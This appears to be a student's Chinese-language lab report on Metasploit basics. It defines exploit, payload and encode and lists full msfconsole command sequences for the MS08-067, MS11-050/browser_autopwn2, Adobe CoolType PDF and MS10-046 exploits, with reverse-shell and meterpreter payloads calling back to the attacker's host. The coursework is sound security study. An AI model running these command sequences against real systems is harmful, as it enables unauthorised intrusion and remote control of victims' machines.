Exp5：MSF基础应用

Exp5：MSF基础应用

一、基础问题回答

（1）用自己的话解释什么是 exploit , payload , encode.

exploit： 设相当于利用漏洞偷偷打开的管道，将做好的木马病毒等顺利传输到靶机。

payload: 简单来说就是病毒代码包装成一个可执行的文件，或者包装成指定的类型，然后通过管道传输进去后开始为我们控制靶机服务。

encode: 针对payload进行编码，就是对它进行包装打扮，改变payload代码特征，但是不改变payload为我们所用的特征，但能对payload进行加工。

二、实践过程

• 1.Windows服务渗透攻击——MS08-067安全漏洞

  • 在攻击机kali输入msfconsole进入控制台，依次输入以下指令：

    msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show payloads

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
    
    msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ip
    
    msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口
    
    msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip，特定漏洞端口已经固定
    
    msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型，匹配度较高
    
    msf exploit(ms08_067_netapi) > exploit //攻击
    
    

  • 此时需要关闭靶机的防火墙，不然会出现ConnectionTimeOut的失败；
    

  • 攻击成功后的结果：
    

• 2.浏览器渗透攻击——MS11-050

  • 在攻击机kali输入msfconsole进入控制台，依次输入以下指令：

  msf > use windows/browser/ms11_050_mshtml_cobjectelement

msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http //http反向回连
  
  msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip
  
  msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定
  
  msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置
  
  msf exploit(ms11_050_cobjectelement) > exploit
  
  

• 测试无法成功，总是会出现IE浏览器的错误，我觉得问题是出在浏览器版本不对，不适合那个漏洞，既然如此，那就换个漏洞呗，下面使用一种自动根据浏览器版本选择合适的漏洞进行攻击的方法
  • ** 实施browser_autopwn模块 **

    • 现在攻击机里进入msfconsole，然后分别输入
      
      use auxiliary/server/browser_autopwn2

set SRVHOST 192.168.43.161

set URIPATH auto

show options
      
      

    • 开始攻击，此时可以看到msf在不停的尝试不同的payload
      

    • 尝试成功，输出了可被访问的URL http：//192.168.43.161:8080/auto并启动服务器；
      

    • 在靶机浏览器上输入URL后，浏览器跳转到 http：//192.168.43.161:8080/auto/FaOGsp上
      

    • 回头看一下kali机，发现回连成功了，输入session -i 2获取对话，此时，已经获得了靶机的控制权。
      

• 3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton

  • 在攻击机kali输入msfconsole进入控制台，依次输入以下指令：

  msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回连
  
  msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip
  
  msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口
  
  msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字
  
  msf exploit(adobe_cooltype_sing) > exploit //攻击

  • 将生成的pdf文件拷贝到靶机上。
    

  • 在kali上输入back退出当前模块，进入监听模块，输入以下命令：

  msf > use exploit/multi/handler //进入监听模块
  
  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
  
  msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip
  
  msf exploit(handler) > set LPORT 5213 //攻击端口固定
  
  msf exploit(handler) > exploit
  
  

  • 在靶机上打开5213lzm.pdf文件：
    
  • 攻击机显示攻击成功：
    
• 4.快捷方式图标漏洞——MS10-046
  • 在攻击机kali输入msfconsole进入控制台，依次输入以下指令：
    
    msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48 //攻击机ip
    
    msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
    
    msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48 //攻击机ip
    
    msf exploit(ms10_046_shortcut_icon_dllloader) > exploit //攻击
    
    
    • 此时弹出一个攻击者IP的目录，其中有一个“快捷方式”的图标：
      
    • 对于已建立好了会话，通过命令sessions查看，并选择sessions -i 1，获得靶机控制权。
      
      （PS）本次试验时间上跨度有点大，没能连贯的做完，第四个项任务是在ciscn结束之后做的，而此时的kali机已被折腾崩了，所以考了别人的虚拟机，继续做完了，这里的IP不是之前那个。

三、实践总结及体会

本次试验给我最深的感触就是msf的强大，活用msf真的能够在渗透测试或者以攻击为目的的行为给予很大帮助，同时，为了防止被攻击，还是及时更新系统，填补漏洞，因为有一双研眼镜正在窥探你的笔记本。